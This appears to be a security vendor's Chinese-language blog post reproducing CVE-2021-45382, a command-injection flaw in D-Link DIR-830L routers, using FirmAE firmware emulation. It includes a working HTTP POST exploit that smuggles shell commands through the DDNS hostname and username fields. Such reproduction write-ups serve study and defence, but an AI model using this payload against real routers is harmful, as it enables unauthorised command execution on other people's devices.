提交需求
    *
    *

    *
    *
    *
    立即提交
    点击”立即提交”,表明我理解并同意 《黄金城科技隐私条款》

    logo

      产品与服务
      解决方案
      技术支持
      合作发展
      关于黄金城

      申请试用
        D-Link DIR-830L 路由器命令执行漏洞(CVE-2021-45382)复现
        发布时间:2023-06-30 阅读次数: 1555 次


        环境搭建

        1.FirmAE 工具安装

        首先拉取FirmAE 工具仓库


        git clone --recursive https://github.com/pr0v3rbs/FirmAE

        图片

        运行下载脚本


        1. cd FirmAE/
          ./download.sh


        图片

        运行./install.sh进行安装

        图片

        图片

        2.下载固件

        本文模拟的是设备型号为D-Link DIR-830L

        下载地址:


        https://legacy.us.dlink.com/pages/product.aspx?id=f5e0c0a1975a46bab0b5f38b22c5087b
        下载后得到DIR830LA1_FW100B07.bin固件文件
        图片

        3.FirmAE工具初始化

        FirmAE工具目录下执行./init.sh进行初始化

        图片
        4.安装binwalk
        这里使用FirmAE工具目录下的binwalk安装程序进行安装
        cd binwalk-2.3.3/
        python3 setup.py install

        5.模拟运行固件
        执行如下命令对固件进行解压
        binwalk -Me /root/DIR830LA1_FW100B07.bin --run-as=root
        图片
        执行如下命令来模拟运行固件
        sudo ./run.sh -r DIR-830 /root/DIR830LA1_FW100B07.bin
        图片
        使用浏览器访问
        http://192.168.0.1
        图片

        漏洞复现

        Exp如下:

        POST /ddns_check.ccp 
        HTTP/1.1Host: 192.168.0.1
        User-Agent:Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101Firefox/95.0
        Accept: */*
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest
        Content-Length: 102
        Origin: http://192.168.0.1
        Connection: close
        Cookie: uid=YnnCDFxmJY # 认证信息,此漏洞需要认证
        ccp_act=doCheck&ddnsHostName=;ls />/www/1.html;&ddnsUsername=;ls />/www/1.html;&ddnsPassword=123123123

        图片

        这里我们已经成功看到执行系统命令,并将ls /命令的结果写入1.html中,直接访问即可查看命令执行的效果。

        图片


        免费试用
        服务热线

        马上咨询

        400-811-3777

        回到顶部
        【网站地图】【sitemap】